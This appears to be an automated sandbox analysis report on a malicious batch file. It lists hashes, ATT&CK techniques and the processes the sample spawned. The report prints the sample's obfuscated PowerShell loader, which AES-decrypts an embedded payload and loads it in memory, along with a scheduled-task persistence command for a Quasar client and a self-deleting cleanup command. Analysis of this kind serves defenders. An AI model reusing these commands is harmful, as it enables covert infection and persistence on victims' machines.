a858b2b8b4be7cb23e0a7d37a0c08489a6820cb1be5523a7a466014eb994391f

Analysis

max time kernel
63s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
31-03-2023 16:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$RECYCLE.BIN/$RJXIQS1.bat
Size

325KB
MD5

09329152d36bbe721ce3504787436cf2
SHA1

713a6fb0da4a111649bc7268f193ba52463e3576
SHA256

67e3ece7d1bf12285f01930d6eb28b91ba4a02551d24648ddc79a17cbb9d9423
SHA512

ee5ad3c41a7822bcc759fa3a33dd2d404cf57f1b074973a61f59c2163bb4062c908b820eb9a0e7fde009be42e6cdcab85ea5373805bbc242ea47957c9fd44a7e
SSDEEP

6144:uhhAqNRvU+SV6ukYulDTHKqFSC6M+cnyJZAneGwJZfNiINj:uhhAANCkJlqqFSC6dcyQo15j

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

$RJXIQS1.bat.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	$RJXIQS1.bat.exe

Executes dropped EXE 2 IoCs

Processes:

$RJXIQS1.bat.exesound.exe

pid process

2320 $RJXIQS1.bat.exe
2616 sound.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2252 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

$RJXIQS1.bat.exesound.exe

pid process

2320 $RJXIQS1.bat.exe
2320 $RJXIQS1.bat.exe
2616 sound.exe
2616 sound.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

$RJXIQS1.bat.exesound.exe

description pid process

Token: SeDebugPrivilege 2320 $RJXIQS1.bat.exe
Token: SeDebugPrivilege 2616 sound.exe

pid	process
2320	$RJXIQS1.bat.exe
2616	sound.exe

pid	process
2252	schtasks.exe

pid	process
2320	$RJXIQS1.bat.exe
2320	$RJXIQS1.bat.exe
2616	sound.exe
2616	sound.exe

description	pid	process
Token: SeDebugPrivilege	2320	$RJXIQS1.bat.exe
Token: SeDebugPrivilege	2616	sound.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exe$RJXIQS1.bat.execmd.exe

description	pid	process	target process
PID 432 wrote to memory of 2320	432	cmd.exe	$RJXIQS1.bat.exe
PID 432 wrote to memory of 2320	432	cmd.exe	$RJXIQS1.bat.exe
PID 2320 wrote to memory of 2252	2320	$RJXIQS1.bat.exe	schtasks.exe
PID 2320 wrote to memory of 2252	2320	$RJXIQS1.bat.exe	schtasks.exe
PID 2320 wrote to memory of 2616	2320	$RJXIQS1.bat.exe	sound.exe
PID 2320 wrote to memory of 2616	2320	$RJXIQS1.bat.exe	sound.exe
PID 2320 wrote to memory of 1008	2320	$RJXIQS1.bat.exe	cmd.exe
PID 2320 wrote to memory of 1008	2320	$RJXIQS1.bat.exe	cmd.exe
PID 1008 wrote to memory of 3652	1008	cmd.exe	choice.exe
PID 1008 wrote to memory of 3652	1008	cmd.exe	choice.exe
PID 1008 wrote to memory of 3580	1008	cmd.exe	attrib.exe
PID 1008 wrote to memory of 3580	1008	cmd.exe	attrib.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

3580 attrib.exe

pid	process
3580	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:432

C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe
"$RJXIQS1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $Mulkj = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat').Split([Environment]::NewLine);foreach ($IRhUZ in $Mulkj) { if ($IRhUZ.StartsWith(':: ')) { $DfRfS = $IRhUZ.Substring(3); break; }; };$tUDnz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DfRfS);$mhFKv = New-Object System.Security.Cryptography.AesManaged;$mhFKv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$mhFKv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$mhFKv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sLPwO8+S6swu7bBaCR3UKxvgiQCK9eRNWGiIj+Y64B4=');$mhFKv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wgIbPD7/o3xb1XnxDadMKQ==');$lUXqc = $mhFKv.CreateDecryptor();$tUDnz = $lUXqc.TransformFinalBlock($tUDnz, 0, $tUDnz.Length);$lUXqc.Dispose();$mhFKv.Dispose();$Trzho = New-Object System.IO.MemoryStream(, $tUDnz);$SevxL = New-Object System.IO.MemoryStream;$lSUMa = New-Object System.IO.Compression.GZipStream($Trzho, [IO.Compression.CompressionMode]::Decompress);$lSUMa.CopyTo($SevxL);$lSUMa.Dispose();$Trzho.Dispose();$SevxL.Dispose();$tUDnz = $SevxL.ToArray();$LtGjo = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($tUDnz);$tvDtB = $LtGjo.EntryPoint;$tvDtB.Invoke($null, (, [string[]] ('')))
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2252

C:\Users\Admin\AppData\Roaming\SubDir\sound.exe
"C:\Users\Admin\AppData\Roaming\SubDir\sound.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1008

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
4⤵
PID:3652

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe"
4⤵
- Views/modifies file attributes
PID:3580

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l40xtllo.533.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\sound.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\sound.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/2320-143-0x000001F35ECD0000-0x000001F35ECE0000-memory.dmp

Filesize
64KB

Download
memory/2320-150-0x000001F35ECD0000-0x000001F35ECE0000-memory.dmp

Filesize
64KB

Download
memory/2320-148-0x000001F35ECD0000-0x000001F35ECE0000-memory.dmp

Filesize
64KB

Download
memory/2320-147-0x000001F346970000-0x000001F346992000-memory.dmp

Filesize
136KB

Download
memory/2616-165-0x000001FD3A340000-0x000001FD3A384000-memory.dmp

Filesize
272KB

Download
memory/2616-166-0x000001FD3A410000-0x000001FD3A486000-memory.dmp

Filesize
472KB

Download
memory/2616-167-0x000001FD37380000-0x000001FD37390000-memory.dmp

Filesize
64KB

Download
memory/2616-168-0x000001FD37380000-0x000001FD37390000-memory.dmp

Filesize
64KB

Download
memory/2616-169-0x000001FD37380000-0x000001FD37390000-memory.dmp

Filesize
64KB

Download
memory/2616-170-0x000001FD37380000-0x000001FD37390000-memory.dmp

Filesize
64KB

Download
memory/2616-171-0x000001FD37380000-0x000001FD37390000-memory.dmp

Filesize
64KB

Download
memory/2616-172-0x000001FD37380000-0x000001FD37390000-memory.dmp

Filesize
64KB

Download